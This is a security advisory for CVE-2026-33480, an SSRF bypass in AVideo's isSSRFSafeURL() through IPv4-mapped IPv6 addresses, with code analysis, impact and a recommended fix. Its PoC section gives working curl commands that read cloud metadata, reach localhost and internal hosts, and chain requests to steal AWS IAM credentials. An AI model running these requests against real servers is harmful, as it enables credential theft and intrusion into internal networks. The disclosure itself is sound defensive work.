PHP CVE-2026-33480

Summary

The isSSRFSafeURL() function in AVideo can be bypassed using IPv4-mapped IPv6 addresses (::ffff:x.x.x.x). The unauthenticated plugin/LiveLinks/proxy.php endpoint uses this function to validate URLs before fetching them with curl, but the IPv4-mapped IPv6 prefix passes all checks, allowing an attacker to access cloud metadata services, internal networks, and localhost services.

Details

The isSSRFSafeURL() function in objects/functions.php (lines 4021-4169) implements SSRF protection with two separate check paths:

1. IPv4 checks (lines 4101-4134): Regex patterns matching dotted-decimal notation (/^10\./, /^172\./, /^192\.168\./, /^127\./, /^169\.254\./)
2. IPv6 checks (lines 4150-4166): Checks for ::1, fe80::/10 (link-local), and fc00::/7 (unique local)

The gap: IPv4-mapped IPv6 addresses (::ffff:0:0/96) are not checked in either path. When a URL like http://[::ffff:169.254.169.254]/ is provided:

// Line 4038: parse_url strips brackets from IPv6 host
$host = parse_url($url, PHP_URL_HOST);
// $host = "::ffff:169.254.169.254"

// Line 4079: filter_var recognizes it as valid IPv6, skips DNS resolution
if (!filter_var($host, FILTER_VALIDATE_IP)) {
    $resolvedIP = gethostbyname($host);  // SKIPPED
}
$ip = $host;  // $ip = "::ffff:169.254.169.254"

// Lines 4101-4134: IPv4 regex checks DON'T match (not dotted-decimal)
if (preg_match('/^169\.254\.\d{1,3}\.\d{1,3}$/', $ip))  // NO MATCH

// Lines 4150-4166: IPv6 checks don't cover ::ffff: prefix
if ($ip === '::1' || ...)                    // NO MATCH
if (preg_match('/^fe[89ab][0-9a-f]:/i', $ip))  // NO MATCH
if (preg_match('/^f[cd][0-9a-f]{2}:/i', $ip))  // NO MATCH

// Line 4168: returns TRUE - bypass complete
return true;

The vulnerable endpoint plugin/LiveLinks/proxy.php explicitly disables authentication:

// proxy.php lines 2-3
$doNotConnectDatabaseIncludeConfig = 1;
$doNotStartSessionbaseIncludeConfig = 1;

After the bypass, two requests are made to the attacker-controlled URL:

1. get_headers() at line 40 (via stream context)
2. fakeBrowser() at line 63 (via curl) - response content is echoed back to the attacker (lines 69-80)

PoC

Read AWS instance metadata (IAM credentials):

curl -s 'https://target.com/plugin/LiveLinks/proxy.php?livelink=http://[::ffff:169.254.169.254]/latest/meta-data/'

Access localhost services:

curl -s 'https://target.com/plugin/LiveLinks/proxy.php?livelink=http://[::ffff:127.0.0.1]:3306/'

Scan internal network:

curl -s 'https://target.com/plugin/LiveLinks/proxy.php?livelink=http://[::ffff:10.0.0.1]/'

Steal AWS IAM role credentials (full chain):

# Step 1: Get IAM role name
ROLE=$(curl -s 'https://target.com/plugin/LiveLinks/proxy.php?livelink=http://[::ffff:169.254.169.254]/latest/meta-data/iam/security-credentials/')
# Step 2: Get temporary credentials for the role
curl -s "https://target.com/plugin/LiveLinks/proxy.php?livelink=http://[::ffff:169.254.169.254]/latest/meta-data/iam/security-credentials/${ROLE}"

Impact

• Cloud credential theft: Unauthenticated attackers can read cloud instance metadata (AWS IMDSv1, GCP, Azure) to steal IAM credentials, potentially gaining full access to cloud infrastructure.
• Internal network access: Attackers can scan and access internal services not exposed to the internet, including databases, admin panels, and other backend services.
• Localhost service access: Attackers can interact with services bound to localhost (e.g., Redis, Memcached, internal APIs).
• No authentication required: The endpoint explicitly disables session handling and database connections, making this exploitable by any anonymous internet user.

Recommended Fix

Replace the manual IPv4/IPv6 blocklist approach with PHP's built-in FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE flags, which correctly handle all private/reserved ranges including IPv4-mapped IPv6 addresses:

// In isSSRFSafeURL(), replace lines 4099-4166 with:

// Block all private and reserved IP ranges (handles IPv4, IPv6, and IPv4-mapped IPv6)
if (!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {
    _error_log("isSSRFSafeURL: blocked private/reserved IP: {$ip}");
    return false;
}

This single check replaces all the manual regex patterns and correctly handles:

• All RFC 1918 private ranges (10/8, 172.16/12, 192.168/16)
• Loopback (127/8, ::1)
• Link-local (169.254/16, fe80::/10)
• Unique local (fc00::/7)
• IPv4-mapped IPv6 (::ffff:0:0/96) - the bypass vector in this finding
• Other reserved ranges (0/8, 100.64/10 CGN, etc.)